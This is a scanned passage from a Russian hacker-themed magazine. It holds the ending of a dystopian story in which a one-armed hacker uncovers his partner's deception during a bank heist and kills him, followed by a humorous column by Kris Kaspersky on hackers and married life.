Петерсен встал, похлопал его плечу, ушел. 

Клейн проводил его спину взглядом, прищурился. 

— Ничего, говоришь? Вот уж не думал, что ты мне когда-нибудь соврешь... 

Он подошел к окну, ткнулся лбом в стекло и принялся повторять 
про себя последовательности чисел и какие-то команды. 

То, что он успел запомнить, взломав компьютер Петерсена. 

С этого дня — своего врага. 


Следующий «экс» им было суждено совершить спустя три недели по- 
сле случившегося. Петерсен пришел, как вихрь — как всегда, ближе к 
вечеру, назвал задание. Федеральный банк уже, безусловно, отпадал 
— Клейн проверил его несколько дней назад, там и мышь не проско- 
чит. Ребята наворотили таких преград, что, кажется, сами были не ра- 
ды — настолько сложной и неповоротливой стала система. 

И, тем не менее, найти в ней брешь не удалось. 

Клейн сообщил об этом Петерсену. Тот только лишь ухмыльнулся. 
— Когда придет время — я ткну пальцем тебе и этим парням из Дви- 
жения туда, где у меня протоптана очередная тропинка. Я не сижу без 
дела. Не шарюсь в чужих компах без причины. Я — Исключительно 
Деловой Человек. И только поэтому в тот день ты не попал в больницу. 
Ты мне нужен. Ты — мой инструмент. Инструмент для дела. А все, что 
мне нужно для дела, должно быть всегда под рукой. 

Клейн выслушал этот монолог и запомнил только одно — Петер- 
сен принесет работу. И у него обязательно будет готово решение — 
хотя бы приблизительное, промежуточное. 

Это наводило на определенные мысли... 

— Работаем, — коротко сказал Петерсен, войдя в квартиру. Он швыр- 
нул на пол сумку, с которой никогда не расставался, открыл шкаф 

и включил компьютер. 

— Чего ждешь? — грозно спросил он у Клейна. — Я же сказал — работаем! 
— Конечно, конечно, — согласно кивнул Клейн, ушел к себе, нацепил 
гарнитуру, услышал: 

— Иди за мной. 

Они вышли в Сеть. 

И Клейн сразу почувствовал, что Петерсен идет протоптанной 
дорожкой. Казалось, что он взламывает систему по учебнику — мето- 
дично, неторопливо, с абсолютной грамотностью. Так можно было ра- 
ботать либо гению, либо человеку, который делал эту работу в этом 
сегменте Сети не первый раз. 

Петерсен дождался, когда Клейн вывалит на серверы банка мас- 
су запросов, запустит кучу сетевых утилит и вызовет ответную реак- 
цию администраторов. Все получалось, как обычно — в таких учреж- 
дениях люди никогда не получали деньги зря. Клейн ощутил сопротив- 
ление, которое возрастало с каждой минутой. 

— Я начинаю, — услышал он в голове. Гарнитуры, которые Петерсен 
усовершенствовал сам, создавали невероятное объемное звучание 
где-то прямо в мозгах, отчего сложно было понять, откуда в действи- 
тельности доносится голос. 

— Давай, — отозвался Клейн. После чего вынул из стола диск и вста- 
вил его в привод. Впервые за все время совместной работы он порадо- 
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вался, что Петерсен не видит его сейчас. Диск тихо зажужжал, на 
экране появилось простенькое окно автостарта. Клейн выбрал самый 
верхний пункт и на мгновение замер. 

Ничего не произошло. На первый взгляд. Все было как всегда. 
Атака Клейна постепенно затихала, спотыкаясь о все большее и боль- 
шее количество преград; Петерсен перекачивал финансы в нужном и 
известном ему одному направлении. 

Но существовал еще один процесс — для Петерсена сейчас не- 
видимый. Будь он в курсе — Клейну несдобровать. 

С компьютера Петерсена к Клейну лился поток данных. Все, что 
хранилось в запароленных директориях, отдавало сейчас свои тайны. 

И когда Петерсен сказал «Стоп», Клейн уже выключил свой 
сканер, закрыл всю перекачанную информацию и спокойно прервал 
атаку на банк. 

Петерсен прошел мимо его комнаты к холодильнику, достал па- 
кет молока, налил себе полную кружку. 

— Все удачно? — спросил он у Клейна через стену. 

— Само собой, — отозвался тот. Очень сильно ныло предплечье — ра- 
бота требовала очень большой активности мышц. 

— Кто сегодня готовит ужин? 

— Как угодно, — Клейн вышел из комнаты. — Сколько на этот раз? 

— Почти двадцать три миллиона. Ладно, я сделаю. У тебя, наверное, 
рука болит. 

Петерсен прекрасно понимал, что он сам работал за себя одного 
— авот Клейн симулировал атаку с множества компьютеров, что тре- 
бовало максимальной скорости работы протеза. 

— Да уж, — Клейн потер руку, которая производила впечатление дере- 
вянной. — Когда-нибудь ее сведет судорога — и нас никто не спасет. 

— На этот случай надо иметь рядом с собой иголку — уколешь в комок 
мыщц, и все сразу пройдет. Так делают пловцы в море — всегда име- 
ют при себе булавку, — Петерсен сказал это таким тоном, словно 
Клейн не имел права на ошибку. — Если ты не сможешь прикрывать 
меня — нам недолго останется. И даже Движение не сможет вытащить 
нас из тех переделок, что предстоят в случае провала. 

Клейн кивнул. Перед его глазами стояла полоска трансфера — 
он думал, что же он найдет завтра среди той информации, что скачал 
сегодня у Петерсена под прикрытием «экса». 

А Петерсен сидел на табуретке, глядя в окно, пил молоко и думал 
о том, что когда-нибудь все это кончится... 
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Клейн второй день раскладывал по полочкам то, что сумел добыть. 
Информации было более чем достаточно. Временами он посматривал 
на свой протез, щелкал пальцами, поглаживал уцелевшей рукой пра- 
вое предплечье и качал головой. 

Петерсена не было все это время. Он никогда не отчитывался — 
где он, с кем, что делает. Сколько Клейн помнил, его напарник был 
фигурой серьезной, загадочной — особенно он вырос в глазах Клейна 
после упоминания о взломе баз Движения. 

И воттеперь — с каждым открытым файлом — авторитет Петерсена 
падал и падал. Все ниже и ниже. Казалось, что он уже никогда не станет 
для Клейна тем, кем был — ведущим их пары, учителем, наставником. 

— И ведь я был уверен, что здесь дело нечисто, — бормотал он, читая 
документы с экрана. — Но не до такой же степени... 
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ПАРЕНЬ 
ЗАМОЛЧАЛ — 
И СПУСТЯ ПАРУ 
СЕКУНД 

КЛЕЙН ПОНЯЛ, 
ЧТО ОН ПРОСТО 
РАСТВОРИЛСЯ 
ВТОМ 
МРАКЕ, 

В КОТОРОМ 
ПРЯТАЛСЯ 


Он вспомнил, как нашел агентов Движения — через уличных торгов- 
цев наркотиками. Они всегда следили за такими, как Клейн — людьми 
без правой руки, голодными, грязными, в кармане нет карточки реги- 
страции в Сити, только справка о гражданской казни, по которой мак- 
симум, на что он мог рассчитывать — на пакет с едой на сутки в марке- 
тах для бедных. 

Парень с оттопыренными карманами подошел к нему сзади, мяг- 
ко прикоснулся к плечу, прошептал: 

— Привет... Где потерял руку? 

— Гражданская казнь, — не оборачиваясь, ответил Клейн. — Что тебе 
надо? Отведешь меня в полицию? 

— Зачем? — голос из-за спины не спешил исчезать — как, впрочем, 
не спешил и появиться перед глазами Клейна. — Таких как ты ищут 
совершенно другие. Слышал про Движение? 

— Слышал, — ответил Клейн и резко повернулся. Парень отшат- 
нулся куда-то в тень, сделав все возможное, чтобы оставить свое 
лицо в тайне. 

— Не надо резких движений, — сказал он из полумрака. — Я здесь да- 
леко не последний человек, все мои разговоры с посторонними людь- 
ми должны быть продуманными, взвешенными — иначе решат, что 

я сотрудничаю с полицией, и мой бизнес накроется. А у меня есть ма- 
ленькая сестренка, которой надо дать образование... 

— К черту сестренку, — буркнул Клейн. — Никогда не поверю. 
Чушь. Что ты знаешь о Движении? Ты состоишь в нем? Или имеешь 
выходы на их сеть? 

Парень замолчал — и спустя пару секунд Клейн понял, что он 
просто растворился в том мраке, в котором прятался. 

— Я был слишком настойчив, — сказал сам себе Клейн. Машинально 
попытался пригладить волосы на голове, махнул отсутствующей кис- 
тью, выругался. У него только что был шанс выйти на Движение и на- 
чать поиски дочери. Настоящей, реальной девочки, не то, что у этого 

дилера — «У меня сестренка, образование, здоровье...». 

Он сделал пару шагов по переулку, разглядывая указатели — 
ему был нужен маркет, он не ел уже два дня. Торговцы ненавидят та- 
ких, как он — отказывают даже при предъявлении карточки, по кото- 
рой обязаны накормить его. 

Внезапно перед ним появился человек. 

— Вы Клейн. Ваша казнь была два с половиной месяца назад. Вы по- 
теряли руку, вас понизили в правах. 

— Иещеу меня забрали ребенка, — зачем-то сказал Клейн. 

— Бывает, — человек, как и исчезнувший дилер, стоял, прикрывая ли- 
цо тенью. — Вы хотите получить работу? Хорошую работу — но вам 
придется жить на нелегальном положении. Возможно, очень и очень 
долго. Вы слишком известная личность, чтобы сразу ринуться осваи- 
вать территорию Империи с поддельным паспортом. Поживете, пора- 
ботаете. Подождем, когда слухи о вас перестанут будоражить поли- 
цейские участки. Глядишь, и сможем легализовать вас — все зависит 
от того, как вы будете работать. 

— Вы поможете найти мою 
дочь? 

— Думаю, сейчас не время 
торговаться. Какая к черту 
дочь, через пару дней вы сва- 
литесь от голода, и вас, как 
ненужный элемент, сожгут в 
крематории — едва только 
увидят, что у вас нет руки. Вы 
еще плохо знаете, как Импе- 
рия обходится с неугодными. 
Вы — остались в живых. Еще 
тысячу подобных вам расстре- 
ляли у той же кирпичной сте- 
ны, что и ваш компьютер. 

— Чем они руководствуются, 
убивая одних и оставляя в жи- 
вых других? — Клейн был 
удивлен услышанным. Он был 
уверен, что возле той стены 
ни разу не пролилась челове- 
ческая кровь. 

— Целесообразность поступ- 
ков имперских судей не под- 
дается логике простого обы- 
вателя. Но факт остается фак- 


том — погибло достаточно много неугодных им людей. Не хакеров, ко- 
нечно — столько знатоков компьютеров вряд ли найдется во всей Им- 
перии. То, что вы остались живы — большой плюс... 

— Для меня? 

— Для Движения. Нам очень не хватает специалистов вашего профиля. 
Насчет уровня не скажу, потому что пока не знаю о вас ничего — но 
сам факт отсутствия у вас правой руки говорит о вашей квалификации. 
— Это говорит лишь о том, что, несмотря на все мое искусство, я по- 
пался, — зло ответил Клейн. — Я взялся за дело, которое изначально 
было мне не по зубам — всему виной были деньги. В наше трудное 
время их никогда не хватает — вот я и полез... 

— Вы можете напомнить мне обстоятельства дела? 

— Могу, — Клейн кивнул. — Была нужна информация. Я добыл ее. И 
все это оказалось подставой. От начала и до конца. 

— Это говорит лишь о том, что вы не можете работать с людьми. Ну, по- 
думаешь, не распознали в заказчике агента спецслужбы! Но работу-то 
то вы выполнили. Я предлагаю вам работу в такой обстановке, когда не 
придется думать о том, кто стоит за заданием. Вы будете уверены в тех, 
кто окружает вас. Уверены полностью, на сто процентов. Вы будете до- 
верять им свои самые потайные мысли, они станут вашими друзьями, 
вашими верными товарищами. Движение умеет отбирать кадры. 

— Я готов, — тут же согласился Клейн. — Мне предоставят жилье, 
питание? 

— Вам предоставят ВСЕ. Стойте на этом месте и ждите. Через двад- 
цать минут к вам подойдет человек, назовет пароль. Вы поступите в 
его полное распоряжение. И когда мы поймем, что не зря взяли вас — 
тогда поговорим и о вашей дочери. 

Ровно через двадцать минут к Клейну подошел человек, произ- 
нес пароль и назвался Петерсеном. Они стали друзьями на долгие че- 
тыре года. 

И вот теперь их дружба рассыпалась в пыль с каждым открытым 
файлом. 


Клейн пил пиво. 

Он пил его уже несколько часов. Он вытащил из холодильника 
две больших упаковки и всасывал его банку за банкой. Уже десять или 
двенадцать мятых жестянок валялись у его ног — а он все никак не 
мог достичь адекватного состояния. 

— «Вы будете уверены... На сто процентов...», — бурчал он. Алкоголь 
всегда подстегивал его к разговорам с самим собой — если он пил в 
одиночестве. А вспомнить, когда он последний раз выпивал в компа- 
нии, он вряд ли бы смог. Скорее всего, это было очень и очень давно, 
до того расстрела у кирпичной стены, до перехода на нелегальное по- 
ложение. 

Он выпил еще одну банку и сжал ее механическими пальцами. 
Жестянка жалостливо скрежетнула и отлетела в угол. 

Клейн подвинулся к компьютеру, залез на какой-то форум 
и судовольствием нагадил там: 

— Задаете какие-то глупые вопросы... Козлы... Знали бы вы то, что 
знаю я... 

Потом нашел какой-то чат, вступил в пререкания со всеми сразу, 
обозвал всех подонками, уродами, дебилами, перешел Ha нецензур- 
ную лексику и был несказанно рад, как ребенок, что модератор не мо- 
жет выкинуть его — против Клейна он был явно слабоват. Связь с ча- 
том прервалась — администратор, похоже, отключил его, не в силах 
сдержать поток брани нового участника. 

Клейн с силой ударил по клавиатуре и разбил ее. Несколько кла- 
виш упали на пол. Он проводил их пьяным взглядом, потом взял кла- 
виатуру за угол и шарахнул об стол. Стало легче. 

— Его нет уже третий день... — закрыв глаза, произнес Клейн. — У ме- 
ня кончится пиво, потом я протрезвею, а потом он придет, и я ничего 
не смогу ему сказать. Где он пропадает? 

Встав, он едва не упал — комната совершила какой-то перево- 
рот перед его глазами, но механическая рука мгновенно ухватилась за 
кресло, и он устоял на ногах. Подошел к шкафу с зеркальными дверя- 
ми, открыл, посмотрел на компьютер Петерсена. 

— Никаких тайн, — сказал он. — Больше — никаких тайн. И я уже ни- 
когда не найду мою дочь, мою маленькую Шерил... 

И он подумал о том, что не давало ему покоя все эти четыре года. 

О детской кукле в кирпичной пыли у него под ногами. 

Пьяные слезы полились у него из глаз. Тогда, перед расстрелом, 
перед гражданской казнью, он не мог думать ни о чем — только о сво- 
ей смерти. Потом, со временем, он вспоминал эту куклу во снах — но 
Тут же отгораживался от воспоминаний глухой стеной. 


Конечно же, это не была кукла Шерил. Его дочь росла в одном дво- 
ре с семью мальчишками-одногодками — и ей было не до кукол. Она ма- 
стерски стреляла из рогатки, лазила по крышам, хулиганила, как настоя- 
щий пацан — и Клейн не мог ничего изменить. Конечно, он ругал ее, пы- 
тался воздействовать на дочь и кнутом, и пряником — бесполезно. Так 
что кукла была не ее. 

Но сама по себе кукла говорила о том, что у этой стены когда-то стояли и дети. 

Клейн закатил двери назад, вернулся к себе, перешагивая рассы- 
панные по комнате клавиши, тяжело упал в кресло, потянулся за следую- 
щей банкой. Отхлебнул, понял, что уже не чувствует вкуса пива — в рот 
вливалась какая-то противная водянистая субстанция, не имеющая ниче- 
го общего с благородным напитком. Но признаться самому себе в том, что 
уже хватит, он не мог — поэтому сморщился, допил и бросил банку туда 
же, к остальным. 

— Петерсен! — заорал он. — Какого хрена! Где ты есть?! Я хочу услышать от 
тебя самого всю правду! 

Он схватил закрытую банку и резко сжал ее протезом. Она взорвалась, 
обдав его пеной. Он, не обращая на это внимания, продолжал корежить алю- 
миний до тех пор, пока она не превратилась в шар с острыми краями. 

И в этот момент в замке повернулся ключ. Клейн попытался подняться, 
потому что понимал — он должен встретить Петерсена стоя, а не развалив- 
шимся в кресле. Чтобы сразу, в лоб, сказать ему обо всем. 

Встать удалось не сразу — тем временем Петерсен вошел, повесил на 
ручку двери сумку с продуктами, снял плащ и заметил на полу жестянки из- 
под пива. Оглянулся, встретился взглядом с Клейном. Постоял, помолчал. 

— Хочешь сказать, что настало время для разговора? — спросил он Клейна 
через пару минут. 

Клейн кивнул. Пол предательски уплывал из-под ног. Он уже давно пожа- 
лел, что довел себя до поросячьего визга, но пути назад не было. 

— Не стой у порога, — произнес он заплетающимся языком. — Возьми в хо- 
лодильнике еще пару банок... 

— Я думаю, что тебе хватит, — пожал плечами Петерсен. — А мне что-то не хо- 
чется. Поговорим у меня — слишком уж твоя комната напоминает хлев. Я жду. 

Он прошел к себе. Клейн услышал, как отодвигались створки шкафа — 
Петерсен проверял, все ли в порядке на его рабочем месте. 

— Ты смотри, какой... — прошептал Клейн. — Хакер хренов... Да все твои 
тайны у меня давно перед глазами. 

Он вошел в комнату и сел на полу в углу — ноги не держали, а един- 
ственное кресло занял Петерсен. 

— Чем не угодил диван? — спросил хозяин комнаты у Клейна. — Боишься 
обделаться прямо на нем? Похоже, ты выпил около пяти, может даже шести 
литров. Как в тебя влезло? 

Петерсен смотрел на Клейна, слегка щурясь. Чувствовалось, что он на- 
пряжен, но старается ничем это не выдать. Пальцы левой руки тихо поглажи- 
вали протез правой. Временами по механическим пальцам словно пробегала 
волна — они вздрагивали, выдавая сразу серию быстрых, практически неза- 
метных движений. 

— Зачем я был нужен Движению? — спросил Клейн. — Я ведь самый простой 
хакер. Скажем больше — хакер-неудачник. С высоты того опыта, что ты дал 
мне, я понимаю теперь, в какую детскую ловушку я попал. А ты — ты не побо- 
ANCA ХОДИТЬ CO МНОЙ Ha «эксы» уже через два месяца после знакомства... 

Он протер ничего не видящие глаза потными ладонями, прищурился, 
разглядел Петерсена сквозь пьяный туман. 

— Смотришь... Улыбаешься... Скажи, а ты знал с самого первого дня, что 
мою дочь расстреляли? Расстреляли по-настоящему? 

Петерсен щелкнул протезом, резко сжав его в кулак. 

— Что за чушь? Почему ты решил, что я должен это знать? И почему ты счи- 
таешь, что так и случилось? 

— Это есть в моем личном деле, Петерсен. Твой компьютер с некоторых пор 
разучился хранить тайны. Извини, но чужие жизни нельзя калечить сколь 
угодно долго... 

Петерсен метнулся к шкафу, быстро нажал там несколько клавиш, вни- 
мательно изучил логии. 

— Ты блефуешь, — повернулся он к Клейну. — Я уверен, ты не мог залезть ко мне. 
— Мог, не мог — какая разница... — махнул рукой Клейн. — Если бы у тебя 
пропал ребенок, то ты залез бы куда угодно, хоть в ад, чтобы узнать всю пра- 
вду...Вотия — залез, прочитал, поверил. Правда, не сразу. 

Он громко икнул и едва не завалился набок. 

— Будь оно проклято, это пиво... — хватаясь буквально за воздух, Клейн сумел 
удержаться. — Но я не мог воттак сразу — взять и поставить тебя перед фак- 
том. Я и сам до сих пор не верю... Что дочь мертва... 

— Что ты узнал? — Петерсен подошел вплотную, присел рядом на корточки. 
— Говори. Уже нет смысла в недосказанности. 

— Я знаю все, — кивнул Клейн. — Самое главное — я знаю, что никакого 
Движения нет. Есть лишь кучка подонков, которая решила взять под свой 


контроль все кибепространство Империи. Движение... Чушь. Сколько чело- 
век вы убили? Тысячи? Десятки тысяч? 

— Я никого не убивал! — крикнул в лицо Клейну Петерсен. 

— Конечно, это был не ты. Ты только пользовался плодами акций. Тебе под- 
бирали напарника — и ты работал с ними. Помнишь, ты как-то сказал, что 
без меня всегда можешь зайти куда угодно — а вот выйти без проблем у тебя 
почти никогда не получалось? 

— Ты не очень-то похож на пьяного, — процедил сквозь зубы Петерсен. — 
Слишком длинные фразы строишь. 

Он встал, отошел к компьютеру, сел. Потом что-то сделал со своим про- 
тезом, пощелкал пальцами, сжал в кулак и спросил: 
— Продолжение будет? 

— Конечно. 

Клейн поднялся, опираясь о стену. 

— Как я понял, я у тебя — уже третий напарник. Что случилось с предыдущи- 
ми двумя, уточнять не буду, ты все равно соврешь, но рискну предположить 
— они тоже хотели узнать больше, чем есть в свободном доступе... Знаешь, 
Петерсен, я понимаю, что меня сейчас тошнит от пива, но я утешаю себя, что 
эта тошнота — от твоего вида. Мне просто хочется тебя придушить. Вот этой 
самой сделанной тобой рукой. 

Он седлал несколько шагов вперед. Петерсен вскочил со своего кре- 
cna, отступил практически к окну и что-то нажал на своем протезе, выставив 
правую руку в сторону Клейна. Потом еще и еще... 

Клейн остановился, усмехнулся. 

— Мне всегда было интересно, почему наши протезы немного разные — и 
почему ты всегда прячешь железную кисть в рукаве. Теперь я знаю, что 
смущало меня все эти годы. Уровень ампутации. У тебя он значительно 
выше. А палачи Империи не ошибаются при накидывании термоудавки. Не 
хочешь сказать, что стало с твоей рукой? Наверняка что-то банальное — 
какая-нибудь пьяная драка в дебрях ночного города, падение под поезд 
или глубокие ожоги. 

— Почти угадал. Метро. 

— Сам понимаешь, тут промахнуться трудно. И я поверю тебе, что протез ты 
спроектировал сам — и для себя. Хороший протез, просто изумительный... Так 
удобно мне еще никогда не было стакан ко рту подносить... 

— Ты сумел понять конструкцию? 

— Да. Жизнь заставила. В прямом смысле слова. Ведь ты только что несколь- 
ко раз пытался включить мой нейродетонатор. И был искренне удивлен... 

— Был, — Петерсен оставил попытки нажимать скрытую под обшлагом рука- 
ва кнопку. — Не велика заслуга. 
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— Как сказать... — Клейн скорчил пьяную гримасу. — Остаться в живых лю- 
бой ценой — вот теперь мой девиз. 
— Зачем? 


— Чтобы люди узнали, что Движения не существует. 

— Повторюсь — зачем? 

— Чтобы они создали его. Ведь вы — ия благодаря вам — были самыми 
обыкновенными ворами. Прикрываясь великими целями, вы проводили «эк- 
сы» и сливали деньги на счета Империи. Вы искали людей, подобных мне — 
выбирали наиболее талантливых, расстреливали остальных, брали уцелев- 
ших на вооружение, заставляя их перед этим пройти все муки ада граждан- 
ской казни... Вы отсеивали ненужные элементы — и вот наконец-то все ки- 
берпространство в вашей власти. Что дальше? Ни-че-го! 

Он размахнулся и швырнул в лицо Петерсену жестяной шарик с острыми 
краями. Протез придал этому алюминиевому ежу необходимое вращение — 

и спустя секунду фонтан крови взметнулся из перерезанной артерии хакера. 

Петерсен зажал рукой рану и сделал было несколько шагов навстречу 
Клейну, но быстро ослабел от потери крови и упал. Клейн наклонился к нему, 
взглянул в глаза умирающему. 

— Ты ждешь помощи? Ты ведь знаешь, что при отключении детонатора 
здесь должны были оказаться сотрудники спецслужбы. 

Петерсен смотрел на него глазами, полными ужаса смерти. 

— Они не придут. Я отключил все в этом протезе. Все цепи, все устройства. 
Это выглядит так, словно протез сломался. И его выключили и выкинули, за- 
менив на новый. А мне он не нужен. Он не был мне нужен никогда. Просто ты 
этого не знал. Ведь именно поэтому меня оставили в живых. Смотри. 

Он отстегнул протез и положил его Петерсену на грудь. Потом подошел 
к его компьютеру, сел, пододвинул левой рукой клавиатуру — и стал нажи- 
мать клавиши. 

Пальцами обеих рук. 

Клавиши стрекотали так, словно правая рука была на месте, словно ни- 
кто и никогда не отрезал ее на суде. Иногда он приглаживал невидимой ру- 
кой волосы на голове и машинально вытирал пот о джинсы. Это было по- 
следнее, что видел Петерсен в своей жизни. 

А Клейн искал координаты имперских нелегальных кладбищ. Надо бу- 
дет перезахоронить Шерил по-человечески. Для начала... © 
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исходники селенной 


КОЛОНКА КРИСА КАСПЕРСКИ 


<> 


С ЖЕНОИ 


ИЛИ БЕЗ 


ПРОГРАММИРОВАНИЕ — 


Поговорим о наболевшем. О же- 
нах. Мечтая о встрече с прекрас- 
ной незнакомкой, многие даже не 
догадываются: чем эта встреча за- 
канчивается. Когда в жизни хакера 
появляется девушка сразу же воз- 
никает множество проблем и кто 
знает как их разрешить? мыщьх, 
как опытный самец, не знает, но 
догадывается. 

> введение. Есть такая древняя 
легенда. Пришел к мудрецу моло- 
дой человек и спросил: «Скажи, же- 
ниться мне или HET?», на что мудрец 
ответил: «Семья заменяет все! вот 
ступай и подумай, что тебе дороже: 
все или семья». По другой версии 
ответ звучал так: «Как бы ты ни пос- 
тупил, о своем решении ты будешь 
жалеть всю жизнь». Ау нас в наро- 
де говорят: жена — как чемодан без 
ручки: тащить тяжело, а выбросить 
жалко. И еще: в жизни каждого 
мужчины наступает момент, когда 
чистые носки проще купить. Как че- 
ловек, женатый шесть раз, Мыщьх 
это полностью подтверждает. 


Но все это — только краси- 
вые слова и метафоры. Литератур- 
щина в общем. А как насчет реаль- 
ной жизни? 
>» = вне виртуального мира. В ре- 
альной жизни все намного проще и 
прозаичнее. Обычно пик творчес- 
кой активности у хакеров прихо- 
дится на внебрачный период, а по- 
том... потом затягивает бытовуха, 
необходимость посещения много- 
численных родственников жены, 
совместные прогулки, строгий ре- 
жим дня, обед по расписанию ит. 
д. Кому-то это, может быть, ив 
кайф, а кому-то нет. Только нахо- 
дясь наедине с самим собой ты мо- 
жешь полностью отдаться самосо- 
вершенствованию, проводя за 
компьютером все свободное и нес- 
вободное время. Рваный график 
сна, обед в случайное время без 
отрыва от монитора, «марафоны» 
(когда ты проводишь за отладчи- 
ком несколько суток, пока наконец 
не взломаешь программу и зас- 
нешь поперек постели, не раздева- 
ясь, или упадешь прямо на клавиа- 
туру. А что?! Спать на клавиатуре 
очень даже удобно! Главное, что, 
проснувшись, можно сразу же про- 
должить хакерствовать!) — с появ- 
лением девушки от всего этого 
приходится отказываться. 

Кактус, втыкающий в компь- 
ютер по 18-20 часов напролет, ни- 
кому не нужен! Девушки требуют к 
себе внимания, часто устраивая 
истерики в самый неподходящий 
момент, когда ты должен быть наи- 
более собран, сконцентрирован и 
сосредоточен на важной техничес- 
кой проблеме, от которой зависит 
твоя карьера, а, возможно, и вся 
последующая жизнь. Попытки что- 
либо объяснить лишь разжигают 
скандал. Ты меня не любишь, я те- 
бе не нужна ит. д. 

Ревность к компьютеру — 
очень распространенная штука. 
Твоя крошка может закидывать те- 
бя 5М5'ми, подходить к тебе каж- 
дые пять минут только для того, 


чтобы поцеловать и будет страшно 
обижаться, если ты смотришь не в 
ее глаза, а на монитор и руки дер- 
жишь не на грудях, а на клавиату- 
ре. Навряд ли она поймет твою 
одержимость и, скорее всего, 
предложит сменить работу на бо- 
лее цивильную, то есть от звонка 
до звонка и без всякого творчест- 
ва. Хуже всего, если при этом она 
сама не захочет работать, но будет 
требовать денег, одновременно с 
вниманием. Вести некоммерчес- 
кие проекты и оставаться верным 
идее Open Source в таких условиях 
просто нереально. Рифы семейной 
жизни погубили столько хакеров, 
что образовали целое кладбище. 
> — уроки выживания. Женщины 
коварны и хитры, они играют на 
наших инстинктах и природных 
потребностях. Несмотря на то, что 
женского населения у нас больше, 
чем мужского (особенно если вы- 
черкнуть из мужской составляю- 
щей всех тунеядцев, алкоголиков 
и наркоманов), именно мужчины 
окучивают женщин, а не наоборот. 
Как будто женщинам не хочется! 
Хочется еще как! Анекдот «лучше 
пять минут подождать, чем полча- 
са уговаривать» действует только 
так! Не хочешь ухаживать за жен- 
щинами? Хочешь, чтобы они сами 
ухаживали за тобой?! Ну так и не 
ухаживай! Женщины к тебе и потя- 
нуться, только дай им шанс. Для 
этого даже необязательно выхо- 
дить на улицу. Знакомиться можно 
и через Сеть. Главное — помень- 
ше говорить о любви и ничего не 
обещать. 

А очем можно говорить с 
женщиной, да еще с незнакомой?! 
О том, что тебя интересует. Если 
это будет интересовать и ее, диа- 
лог заведется сам собой, ну а нет, 
так нет. Значит, вы — не пара. Ес- 
ли у вас разные интересы и нет ни- 
каких точек соприкосновения, пы- 
таться подобрать тему для разго- 
вора — бессмысленно. Даже если 
вначале все будет ОК, через неко- 


торое время начнутся проблемы 
взаимопонимания. 

Не бросайся в первые же по- 
павшиеся объятия, готовые тебя 
принять. Ищи девушку, которая 
воспринимает тебя таким, какой 
ты есть, которая дышит тем же са- 
мым, чем и ты, ведет такой же об- 
раз жизни и тоже чем-то одержи- 
ма. Необязательно компьютером. 
Это может быть музыка или даже 
вышивание крестиком — главное, 
чтобы она тебя понимала и под- 
держивала в трудную минуту, воз- 
буждала творческий порыв, а не 
гасила его как бычок в писсуаре. 

А для этого никогда не делай 
того, что тебе не нравится. Если 
твоя обычная форма — небритая 
щетина, залитая пивом майка и 
штаны, треснувшие аккурат на 
заднице — вот таким и приходи на 
свидание. Ну и пусть 99% девушек 
от тебя убегут в содрогании, зато у 
тебя появится шанс найти ту един- 
ственную, которая тебя будет лю- 
бить как со штанами, так и без них. 
И ты ее обязательно найдешь, ес- 
ли только будешь искать! Я тебе 
точно говорю! 

Правда здесь мы сталкиваем- 
ся с проблемой совершенно иного 
рода. Одержимые девушки они... 
как бы это помягче сказать... они 
не девушки. Они — одержимые. 
Такие же, как ты сам. А это значит, 
что забота о муже (и детях, если 
они будут) у них отходит на задний 
план, и тебе придется питаться по- 
луфабрикатами до конца жизни. 

Женщина, с которой интерес- 
но поговорить, как правило, совер- 
шенно бездарна в бытовом плане. 
И, наоборот, с хорошей домохозяй- 
кой легко жить (накормит без от- 
рыва от производства и будет пре- 
дано смотреть немигающими гла- 
зами), но... с ней совершенно нео 
чем разговаривать. Единственный 
выход: жена-домохозяйка и одер- 
жимая любовница. Но, как извест- 
но, любовный треугольник — са- 
мая неустойчивая фигура. © 
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